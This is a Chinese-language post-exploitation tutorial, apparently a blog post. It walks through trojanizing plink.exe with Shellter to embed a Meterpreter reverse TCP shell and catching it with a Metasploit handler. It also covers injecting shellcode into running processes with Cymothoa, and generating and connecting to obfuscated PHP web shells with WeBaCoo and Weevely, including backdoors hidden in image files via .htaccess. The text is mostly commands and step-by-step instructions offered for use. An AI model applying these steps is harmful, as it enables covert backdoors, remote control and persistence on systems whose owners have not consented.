后渗透阶段
Shellter - 程序伪装后门
0x00 准备工作1.下载安装 shellter,并解压.
# Kali 安装
apt-get install shellter
# window 安装
下载 https://www.shellterproject.com/download/
2.从Kali系统的“/usr/share/windows-binaries”目录中找到“plink.exe”,然后将其拷贝至Shellter的文件夹中。
3.切换到 /root/Desktop/shellter 目录
0×01 生成后门4.从启动shellter
# Kali 运行
shellter # 如果安装了shellter
wine shellter.exe # 直接使用下载的程序
# window 运行
cmd shellter.exe
文章图片
image
5.键入“A”启用自动模式:
6.在提示PE目标时,输入:“plink.exe”
7.当询问是否启用隐身模式时输入:“Y”
文章图片
image
在隐身模式新功能下,后门文件仍然具有原始文件的功能。
8.当提示输入Payloads时选择“L”然后选择“1” Meterpreter_Reverse_TCP
文章图片
image
9.输入Kali主机的IP(原文作者使用192.168.1.39)
10.输入程序要使用的端口(原文作者使用4545)
文章图片
image
Shellter将会在plink.exe中注入shellcode,这时你可能需要稍等一会儿。然后,你就可以看到:
文章图片
image
这时你会在Shellter目录发现两个文件:‘plink.exe’(这个是被注入shellcode的后门文件)‘plink.exe.bak’(这个是原来的正常文件)
0x02 部署后门并监听11.现在,我们需要在Kali系统中使用和之前相同的一些参数启动一个监听服务
# msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.39
set lport 4545
exploit
文章图片
image
12.把‘plink.exe’复制到Windows系统
文章图片
image
13.如果你在Windows系统里面运行plink.exe
文章图片
image
这里列出了一些帮助信息,但这个操作并不会触发远程shell,但是当我们用plink进行远程登录的时候(这里登陆的是树莓派)如下图所示:
文章图片
image
请注意,我们通过plink得到树莓派ssh的登录提示,同时,在kali中Metasploit也得到了一个session:
文章图片
image
0x03 GetShell这时可以执行sysinfo获得靶机的一些系统信息:
文章图片
image
Cymothoa - 进程注入后门
Cymothoa是一款可以将ShellCode注入到现有进程(插入进程)的后门工具。借助这种注入手段,它能够把ShellCode伪装成常规程序。他说注入的后门程序应当能够与贝注入的程序(进程)共存,以避免被管理或维护人员怀疑。将ShellCode注入到其他进程,还有另外一个优势就是:即使目标系统的安全防护工具能够讲师可执行程序的完整性,只要它不检查内存,那么它就不能发现后门程序(插入进程)的进程。
文章图片
image.png 在使用Cymothoa程序时,必须通过-p选项来指定目标进程的PID,并通过-s选项来指定ShellCode的编号。
文章图片
image.png 你可以在目标主机上使用ps指令,以查看程序的PID信息,另外,你可以使用程序的-s选项列出所有可用的ShellCode对于的编号
在渗透到目标主机之后,可以吧Cymothoa的可执行程序复制到目标主机上,继而生成后门程序。
参考文章
WEB后门(PHP)
WeBaCooWeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可以在客户端和服务器端实现执行代码的网页终端。
WeBaCoo有两种工作模式:
- Generation(生产线模式):指定-g选项可进入这种模式。用户可以在这种模式下制作PHP代码的payload
- Terminal(终端模式):指定-t选项可进入这种模式,用户可以在这种模式下连接到被测主机的后门程序。
文章图片
WeBaCoo
# 创建后门
webacoo -g -f 3 -o shell.php
# 连接后门
webacoo -t -u 'http://127.0.0.1/shell.php'
参考文章
WeevelyWeevely是一款具有高隐蔽性的针对PHP平台的WEBShell。它实现了SSH风格的终端界面,并有大量自动化的模块。测试人员可用它来执行系统命令、远程管理和渗透后期的自动渗透界面。
Weevely的主要用途是:
-
generate.php
生成混淆的PHP backdoor -
generate.img
在图像文件中追加多态后门程序,并可以通过.htaccess
文件赋予图像文件执行权限。 -
generate.htaccess
生成后门.htaccess
文件。 - 可通过help选项列出程序的全部模块和生成工具
文章图片
Weevely
# 创建后门
weevely generate # PHP
weevely generate.img # 生成后门IMG和.htaccess
weevely generate.htaccess .htaccess # 生成后门.htaccess
# 连接后门
weevely
【后渗透阶段】参考文章
推荐阅读
- 开学第一天(下)
- 爱就是希望你好好活着
- 三十年后的广场舞大爷
- Y房东的后半生14
- 七年之痒之后
- MediaRecorder前后摄像头同时录像
- 基于微信小程序带后端ssm接口小区物业管理平台设计
- 迷失的世界(二十七)
- 上班后阅读开始变成一件奢侈的事
- 你有婚内虐待行为吗()